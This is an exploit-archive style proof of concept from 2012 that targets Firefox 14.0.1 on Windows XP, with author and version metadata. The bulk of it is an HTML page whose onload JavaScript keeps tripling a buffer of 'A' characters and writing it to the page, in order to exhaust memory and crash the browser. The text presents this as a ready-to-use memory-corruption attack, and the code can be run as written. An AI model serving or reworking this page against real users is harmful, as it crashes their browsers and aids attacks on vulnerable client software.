Exploit Title: Firefox 14.0.1 Memory Corruption PoC
Crash : http://imageshack.us/f/507/firefoxh.jpg/
Date: July 30, 2012
Author: coolkaveh
coolkaveh () rocketmail com
Https://twitter.com/coolkaveh
Vendor Homepage:http://www.mozilla.org/
version : 14.0.1
Tested on: windows xp SP3
========================================
Awsome coolkaveh
--------------------------------------------------------------------------------
<html>
<head>
<title>coolkaveh</title>
<body onload="javascript:coolkaveh();">
<script language="JavaScript">
function coolkaveh()
{
var buf = '\x41\x41\x41'
for(i=0; i <= 800 ; ++i)
{
buf+=buf+buf
document.write(buf);
}
}
</script>
</head>
</body>
</html>